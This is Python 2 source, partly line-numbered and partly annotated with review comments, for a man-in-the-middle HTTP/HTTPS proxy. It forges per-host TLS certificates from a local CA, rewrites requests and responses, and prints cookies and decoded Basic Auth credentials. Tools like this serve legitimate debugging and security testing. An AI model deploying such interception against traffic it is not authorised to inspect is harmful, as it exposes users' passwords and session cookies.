join_with_script_dir('cert.key') 46 | certdir = join_with_script_dir('certs/') 47 | timeout = 5 48 | lock = threading.Lock() 49 | 50 | def __init__(self, *args, **kwargs): 51 | self.tls = threading.local() 52 | self.tls.conns = {} 53 | 54 | BaseHTTPRequestHandler.__init__(self, *args, **kwargs) 55 | 56 | def log_error(self, format, *args): 57 | # surpress "Request timed out: timeout('timed out',)" 58 | if isinstance(args[0], socket.timeout): 59 | return 60 | 61 | self.log_message(format, *args) 62 | 63 | def do_CONNECT(self): 64 | if os.path.isfile(self.cakey) and os.path.isfile(self.cacert) and os.path.isfile(self.certkey) and os.path.isdir(self.certdir): 65 | self.connect_intercept() 66 | else: 67 | self.connect_relay() 68 | 69 | def connect_intercept(self): 70 | hostname = self.path.split(':')[0] 71 | certpath = "%s/%s.crt" % (self.certdir.rstrip('/'), hostname) 72 | 73 | with self.lock: 74 | if not os.path.isfile(certpath): 75 | epoch = "%d" % (time.time() * 1000) 76 | p1 = Popen(["openssl", "req", "-new", "-key", self.certkey, "-subj", "/CN=%s" % hostname], stdout=PIPE) 77 | p2 = Popen(["openssl", "x509", "-req", "-days", "3650", "-CA", self.cacert, "-CAkey", self.cakey, "-set_serial", epoch, "-out", certpath], stdin=p1.stdout, stderr=PIPE) 78 | p2.communicate() 79 | 80 | self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'Connection Established')) 81 | self.end_headers() 82 | 83 | self.connection = ssl.wrap_socket(self.connection, keyfile=self.certkey, certfile=certpath, server_side=True) 84 | self.rfile = self.connection.makefile("rb", self.rbufsize) 85 | self.wfile = self.connection.makefile("wb", self.wbufsize) 86 | 87 | conntype = self.headers.get('Proxy-Connection', '') 88 | if self.protocol_version == "HTTP/1.1" and conntype.lower() != 'close': 89 | self.close_connection = 0 90 | else: 91 | self.close_connection = 1 92 | 93 | def connect_relay(self): 94 | address = self.path.split(':', 1) 95 | address[1] = int(address[1]) or 443 96 | try: 97 
            # --- tail of the CONNECT tunnel relay; the method header and the
            # opening `try:` are above this chunk (not visible here) ---
            s = socket.create_connection(address, timeout=self.timeout)
        except Exception as e:
            # NOTE(review): broad except hides the real connect failure; the
            # client only ever sees a generic 502.
            self.send_error(502)
            return
        self.send_response(200, 'Connection Established')
        self.end_headers()

        # Blind byte-for-byte relay between client socket and upstream socket.
        conns = [self.connection, s]
        self.close_connection = 0
        while not self.close_connection:
            rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
            if xlist or not rlist:
                # Exceptional condition or select() timeout: stop relaying.
                break
            for r in rlist:
                other = conns[1] if r is conns[0] else conns[0]
                data = r.recv(8192)
                if not data:
                    # Peer closed its side; tear down the tunnel.
                    self.close_connection = 1
                    break
                other.sendall(data)

    def do_GET(self):
        """Proxy one request: read it, pass it through the request/response
        handler hooks, forward it upstream over a cached connection, and relay
        the (possibly modified) response back to the client.

        Also serves the CA certificate when the magic URL
        http://proxy2.test/ is requested, so clients can install it.
        """
        if self.path == 'http://proxy2.test/':
            self.send_cacert()
            return

        req = self
        content_length = int(req.headers.get('Content-Length', 0))
        req_body = self.rfile.read(content_length) if content_length else None

        # Requests arriving over an intercepted TLS connection (or plain
        # origin-form requests) carry only the path; rebuild an absolute URL
        # from the Host header so downstream code sees a full URL.
        if req.path[0] == '/':
            if isinstance(self.connection, ssl.SSLSocket):
                req.path = "https://%s%s" % (req.headers['Host'], req.path)
            else:
                req.path = "http://%s%s" % (req.headers['Host'], req.path)

        # Hook: returning False blocks the request, a non-None value replaces
        # the request body (semantics taken from the calls below; the hook
        # itself is defined elsewhere — presumably overridden by subclasses).
        req_body_modified = self.request_handler(req, req_body)
        if req_body_modified is False:
            self.send_error(403)
            return
        elif req_body_modified is not None:
            req_body = req_body_modified
            # NOTE(review): 'Content-length' lowercase here vs 'Content-Length'
            # elsewhere; harmless only because the header container is
            # case-insensitive — confirm.
            req.headers['Content-length'] = str(len(req_body))

        u = urlparse.urlsplit(req.path)
        scheme, netloc, path = u.scheme, u.netloc, (u.path + '?' + u.query if u.query else u.path)
        assert scheme in ('http', 'https')
        if netloc:
            req.headers['Host'] = netloc
        # Strip hop-by-hop headers before forwarding upstream.
        setattr(req, 'headers', self.filter_headers(req.headers))

        try:
            # self.tls appears to be a thread-local holding a per-origin
            # keep-alive connection cache — confirm against class __init__
            # (outside this chunk).
            origin = (scheme, netloc)
            if not origin in self.tls.conns:
                if scheme == 'https':
                    self.tls.conns[origin] = httplib.HTTPSConnection(netloc, timeout=self.timeout)
                else:
                    self.tls.conns[origin] = httplib.HTTPConnection(netloc, timeout=self.timeout)
            conn = self.tls.conns[origin]
            conn.request(self.command, path, req_body, dict(req.headers))
            res = conn.getresponse()

            # httplib exposes the version as 10/11; map back to a status-line
            # string, and alias res.msg as res.headers for uniform access.
            version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
            setattr(res, 'headers', res.msg)
            setattr(res, 'response_version', version_table[res.version])

            # support streaming: responses with no Content-Length and
            # Cache-Control: no-store are relayed chunk-by-chunk instead of
            # being buffered (body hooks then see an empty body '').
            if not 'Content-Length' in res.headers and 'no-store' in res.headers.get('Cache-Control', ''):
                self.response_handler(req, req_body, res, '')
                setattr(res, 'headers', self.filter_headers(res.headers))
                self.relay_streaming(res)
                with self.lock:
                    self.save_handler(req, req_body, res, '')
                return

            res_body = res.read()
        except Exception as e:
            # Upstream failure: drop the cached connection so the next request
            # reconnects, and report a generic 502 to the client.
            if origin in self.tls.conns:
                del self.tls.conns[origin]
            self.send_error(502)
            return

        # Decode the body so the response hook sees plaintext, regardless of
        # the transfer Content-Encoding.
        content_encoding = res.headers.get('Content-Encoding', 'identity')
        res_body_plain = self.decode_content_body(res_body, content_encoding)

        # Hook: False blocks the response; non-None replaces the plaintext
        # body, which is then re-encoded with the original Content-Encoding.
        res_body_modified = self.response_handler(req, req_body, res, res_body_plain)
        if res_body_modified is False:
            self.send_error(403)
            return
        elif res_body_modified is not None:
            res_body_plain = res_body_modified
            res_body = self.encode_content_body(res_body_plain, content_encoding)
            res.headers['Content-Length'] = str(len(res_body))

        setattr(res, 'headers', self.filter_headers(res.headers))

        # Write the status line and raw header lines back to the client.
        self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
        for line in res.headers.headers:
            self.wfile.write(line)
        self.end_headers()
        self.wfile.write(res_body)
        self.wfile.flush()

        # Persist the exchange under a lock (save_handler defined elsewhere;
        # presumably writes to shared storage, hence the lock).
        with self.lock:
            self.save_handler(req, req_body, res, res_body_plain)

    def relay_streaming(self, res):
        """Relay a streaming response to the client in 8 KiB chunks without
        buffering the whole body. Client disconnects are swallowed."""
        self.wfile.write("%s %d %s\r\n" % (self.protocol_version, res.status, res.reason))
        for line in res.headers.headers:
            self.wfile.write(line)
        self.end_headers()
        try:
            while True:
                chunk = res.read(8192)
                if not chunk:
                    break
                self.wfile.write(chunk)
                self.wfile.flush()
        except socket.error:
            # connection closed by client
            pass

    # All methods share the same proxying logic.
    do_HEAD = do_GET
    do_POST = do_GET
    do_PUT = do_GET
    do_DELETE = do_GET
    do_OPTIONS = do_GET

    def filter_headers(self, headers):
        """Remove hop-by-hop headers (RFC 2616 §13.5.1) and restrict
        Accept-Encoding to encodings this proxy can decode. Mutates and
        returns the same header object."""
        # http://tools.ietf.org/html/rfc2616#section-13.5.1
        hop_by_hop = ('connection', 'keep-alive', 'proxy-authenticate', 'proxy-authorization', 'te', 'trailers', 'transfer-encoding', 'upgrade')
        for k in hop_by_hop:
            # NOTE(review): relies on the message class tolerating deletion of
            # absent keys (rfc822.Message does) — would raise KeyError on a
            # plain dict.
            del headers[k]

        # accept only supported encodings
        if 'Accept-Encoding' in headers:
            ae = headers['Accept-Encoding']
            filtered_encodings = [x for x in re.split(r',\s*', ae) if x in ('identity', 'gzip', 'x-gzip', 'deflate')]
            headers['Accept-Encoding'] = ', '.join(filtered_encodings)

        return headers

    def encode_content_body(self, text, encoding):
        """Compress `text` per the given Content-Encoding.

        Supports identity, gzip/x-gzip and deflate; raises on anything else.
        """
        if encoding == 'identity':
            data = text
        elif encoding in ('gzip', 'x-gzip'):
            # Build the gzip stream in memory; `io` here shadows nothing in
            # Python 2's default namespace but reads oddly — it is a StringIO.
            io = StringIO()
            with gzip.GzipFile(fileobj=io, mode='wb') as f:
                f.write(text)
            data = io.getvalue()
        elif encoding == 'deflate':
            data = zlib.compress(text)
        else:
            raise Exception("Unknown Content-Encoding: %s" % encoding)
        return data

    def decode_content_body(self, data, encoding):
        """Inverse of encode_content_body: decompress `data` per the given
        Content-Encoding and return the plaintext bytes."""
        if encoding == 'identity':
            text = data
        elif encoding in ('gzip', 'x-gzip'):
            io = StringIO(data)
            with gzip.GzipFile(fileobj=io) as f:
                text = f.read()
        elif encoding == 'deflate':
            try:
                text = zlib.decompress(data)
            except zlib.error:
                # Some servers send raw deflate without the zlib header;
                # negative wbits tells zlib to expect a headerless stream.
                text = zlib.decompress(data, -zlib.MAX_WBITS)
        else:
            raise Exception("Unknown Content-Encoding: %s" % encoding)
        return text

    def send_cacert(self):
        """Serve the proxy's CA certificate (path in self.cacert, set
        elsewhere) so clients can download and trust it."""
        with open(self.cacert, 'rb') as f:
            data = f.read()

        # Status line written raw rather than via send_response, so no
        # Server/Date headers are added automatically.
        self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'OK'))
        self.send_header('Content-Type', 'application/x-x509-ca-cert')
        self.send_header('Content-Length', len(data))
        self.send_header('Connection', 'close')
        self.end_headers()
        self.wfile.write(data)

    def print_info(self, req, req_body, res, res_body):
        """Pretty-print the request/response pair to stdout with ANSI colors:
        headers, query parameters, cookies, basic-auth credentials, and
        (truncated) bodies."""
        def parse_qsl(s):
            # One "key   value" pair per line, keys padded to 20 columns.
            return '\n'.join("%-20s %s" % (k, v) for k, v in urlparse.parse_qsl(s, keep_blank_values=True))

        req_header_text = "%s %s %s\n%s" % (req.command, req.path, req.request_version, req.headers)
        res_header_text = "%s %d %s\n%s" % (res.response_version, res.status, res.reason, res.headers)

        print with_color(33, req_header_text)

        u = urlparse.urlsplit(req.path)
        if u.query:
            query_text = parse_qsl(u.query)
            print with_color(32, "==== QUERY PARAMETERS ====\n%s\n" % query_text)

        cookie = req.headers.get('Cookie', '')
        if cookie:
            # Cookies use ';' separators; rewrite to '&' so parse_qsl works.
            cookie = parse_qsl(re.sub(r';\s*', '&', cookie))
            print with_color(32, "==== COOKIE ====\n%s\n" % cookie)

        # Decode and display HTTP Basic credentials in the clear.
        auth = req.headers.get('Authorization', '')
        if auth.lower().startswith('basic'):
            token = auth.split()[1].decode('base64')
            print with_color(31, "==== BASIC AUTH ====\n%s\n" % token)

        if req_body is not None:
            req_body_text = None
            content_type = req.headers.get('Content-Type', '')

            if content_type.startswith('application/x-www-form-urlencoded'):
                req_body_text = parse_qsl(req_body)
            elif content_type.startswith('application/json'):
                try:
                    json_obj = json.loads(req_body)
                    json_str = json.dumps(json_obj, indent=2)
                    # Pretty-print small JSON in full; truncate to 50 lines.
                    if json_str.count('\n') < 50:
                        req_body_text = json_str
                    else:
                        lines = json_str.splitlines()
                        req_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
                except ValueError:
                    # Not valid JSON despite the Content-Type: show raw.
                    req_body_text = req_body
            elif len(req_body) < 1024:
                req_body_text = req_body

            if req_body_text:
                print with_color(32, "==== REQUEST BODY ====\n%s\n" % req_body_text)

        print with_color(36, res_header_text)

        cookies = res.headers.getheaders('Set-Cookie')
        if cookies:
            cookies = '\n'.join(cookies)
            print with_color(31, "==== SET-COOKIE ====\n%s\n" % cookies)

        if res_body is not None:
            res_body_text = None
            content_type = res.headers.get('Content-Type', '')

            if content_type.startswith('application/json'):
                try:
                    json_obj = json.loads(res_body)
                    json_str = json.dumps(json_obj, indent=2)
                    if json_str.count('\n') < 50:
                        res_body_text = json_str
                    else:
                        lines = json_str.splitlines()
                        res_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
                except ValueError:
                    res_body_text = res_body
            elif content_type.startswith('text/html'):
                # (continues past this chunk; regex literal is cut off here)
                m = re.search(r'